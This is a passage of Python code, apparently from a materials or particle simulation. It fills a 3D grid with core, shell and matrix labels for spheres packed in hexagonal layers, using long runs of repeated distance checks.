A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx33/(div))**2+(yy33/(div))**2+(zz33/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx34/(div))**2+(yy34/(div))**2+(zz34/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx35/(div))**2+(yy35/(div))**2+(zz35/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx36/(div))**2+(yy36/(div))**2+(zz36/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx37/(div))**2+(yy37/(div))**2+(zz37/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx38/(div))**2+(yy38/(div))**2+(zz38/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx39/(div))**2+(yy39/(div))**2+(zz39/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx40/(div))**2+(yy40/(div))**2+(zz40/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx41/(div))**2+(yy41/(div))**2+(zz41/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx42/(div))**2+(yy42/(div))**2+(zz42/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx43/(div))**2+(yy43/(div))**2+(zz43/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx44/(div))**2+(yy44/(div))**2+(zz44/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx45/(div))**2+(yy45/(div))**2+(zz45/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx46/(div))**2+(yy46/(div))**2+(zz46/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx47/(div))**2+(yy47/(div))**2+(zz47/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx48/(div))**2+(yy48/(div))**2+(zz48/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx49/(div))**2+(yy49/(div))**2+(zz49/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx50/(div))**2+(yy50/(div))**2+(zz50/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx51/(div))**2+(yy51/(div))**2+(zz51/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx52/(div))**2+(yy52/(div))**2+(zz52/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx53/(div))**2+(yy53/(div))**2+(zz53/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx54/(div))**2+(yy54/(div))**2+(zz54/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx55/(div))**2+(yy55/(div))**2+(zz55/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx56/(div))**2+(yy56/(div))**2+(zz56/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx57/(div))**2+(yy57/(div))**2+(zz57/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
return A
###########################################################################################################################
###########################################################################################################################
def hex7 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs):
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
a=int(i)
b=int(j+(k-1)*Dy1)
xx1=((6)*radiusc/dl-i+1)
yy1= ((6)*radiusc/dl-j+1)
zz1=(radiusc/dl-k+1)
xx2=((6-1.0)*radiusc/dl-i+1)
yy2= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz2=(radiusc/dl-k+1)
xx3=((6+1.0)*radiusc/dl-i+1)
yy3= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz3=(radiusc/dl-k+1)
xx4=((6-1.0)*radiusc/dl-i+1)
yy4= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz4=(radiusc/dl-k+1)
xx5=((6+1.0)*radiusc/dl-i+1)
yy5= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz5=(radiusc/dl-k+1)
xx6=(4*radiusc/dl-i+1)
yy6= (6*radiusc/dl-j+1)
zz6=(radiusc/dl-k+1)
xx7=(8*radiusc/dl-i+1)
yy7= (6*radiusc/dl-j+1)
zz7=(1*radiusc/dl-k+1)
xx8=((6)*radiusc/dl-i+1)
yy8= ((8+sqrt(2.0))*radiusc/dl-j+1)
zz8=(1*radiusc/dl-k+1)
xx9=((6)*radiusc/dl-i+1)
yy9= ((4-sqrt(2.0))*radiusc/dl-j+1)
zz9=(1*radiusc/dl-k+1)
xx10=((10.0)*radiusc/dl-i+1)
yy10= ((6.0)*radiusc/dl-j+1)
zz10=(1*radiusc/dl-k+1)
xx11=((3-1.0)*radiusc/dl-i+1)
yy11= ((6.0)*radiusc/dl-j+1)
zz11=(1*radiusc/dl-k+1)
xx12=((3)*radiusc/dl-i+1)
yy12= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz12=(1*radiusc/dl-k+1)
xx13=(9*radiusc/dl-i+1)
yy13= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz13=(1*radiusc/dl-k+1)
xx14=((9+0.05)*radiusc/dl-i+1)
yy14= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz14=(1*radiusc/dl-k+1)
xx15=((3)*radiusc/dl-i+1)
yy15= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz15=((1)*radiusc/dl-k+1)
xx16=((3+1+0.05)*radiusc/dl-i+1)
yy16= ((11-sqrt(3.0)+0.15)*radiusc/dl-j+1)
zz16=((1)*radiusc/dl-k+1)
xx17=((8)*radiusc/dl-i+1)
yy17= ((11-sqrt(3.0)+0.15)*radiusc/dl-j+1)
zz17=((1)*radiusc/dl-k+1)
xx18=((8)*radiusc/dl-i+1)
yy18= ((1+sqrt(3.0)-0.1)*radiusc/dl-j+1)
zz18=((1)*radiusc/dl-k+1)
xx19=((4)*radiusc/dl-i+1)
yy19= ((1+sqrt(3.0)-0.1)*radiusc/dl-j+1)
zz19=((1)*radiusc/dl-k+1)
# second layer
xx20=((5)*radiusc/dl-i+1)
yy20= ((6)*radiusc/dl-j+1)
zz20=((1+sqrt(3.0))*radiusc/dl-k+1)
xx21=((7.0)*radiusc/dl-i+1)
yy21= ((6.0)*radiusc/dl-j+1)
zz21=((1+sqrt(3.0))*radiusc/dl-k+1)
xx22=((6.0)*radiusc/dl-i+1)
yy22= ((7.0+sqrt(2.0)/2)*radiusc/dl-j+1)
zz22=((1+sqrt(3.0))*radiusc/dl-k+1)
xx23=((6)*radiusc/dl-i+1)
yy23= ((5-sqrt(2.0)/2)*radiusc/dl-j+1)
zz23=((1+sqrt(3.0))*radiusc/dl-k+1)
# third layer
xx24=((6.0)*radiusc/dl-i+1)
yy24= ((6.0-sqrt(3.0)/2)*radiusc/dl-j+1)
zz24=((1+2*sqrt(3.0))*radiusc/dl-k+1)
xx25=((6)*radiusc/dl-i+1)
yy25= ((6+sqrt(3.0)/2)*radiusc/dl-j+1)
zz25=((1+2*sqrt(3.0))*radiusc/dl-k+1)
# fourth layer
xx26=((6.0)*radiusc/dl-i+1)
yy26= ((6.0)*radiusc/dl-j+1)
zz26=((1+3*sqrt(3.0))*radiusc/dl-k+1)
div=float(radiusc)/float(dl)
cc=float(((xx1/(div))**2+(yy1/(div))**2+(zz1/(div))**2) )
# print (xx11,yy11,zz11,3+sqrt(3.0),float(radiusc/dl))
# print radiuscore,radiusshell,radiusc
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx2/(div))**2+(yy2/(div))**2+(zz2/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx3/(div))**2+(yy3/(div))**2+(zz3/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx4/(div))**2+(yy4/(div))**2+(zz4/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx5/(div))**2+(yy5/(div))**2+(zz5/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx6/(div))**2+(yy6/(div))**2+(zz6/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx7/(div))**2+(yy7/(div))**2+(zz7/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx8/(div))**2+(yy8/(div))**2+(zz8/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx9/(div))**2+(yy9/(div))**2+(zz9/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx10/(div))**2+(yy10/(div))**2+(zz10/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx11/(div))**2+(yy11/(div))**2+(zz11/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
# print('aqui')
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx12/(div))**2+(yy12/(div))**2+(zz12/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx13/(div))**2+(yy13/(div))**2+(zz13/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx14/(div))**2+(yy14/(div))**2+(zz14/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx15/(div))**2+(yy15/(div))**2+(zz15/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx16/(div))**2+(yy16/(div))**2+(zz16/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx17/(div))**2+(yy17/(div))**2+(zz17/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx18/(div))**2+(yy18/(div))**2+(zz18/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx19/(div))**2+(yy19/(div))**2+(zz19/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx20/(div))**2+(yy20/(div))**2+(zz20/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx21/(div))**2+(yy21/(div))**2+(zz21/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx22/(div))**2+(yy22/(div))**2+(zz22/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
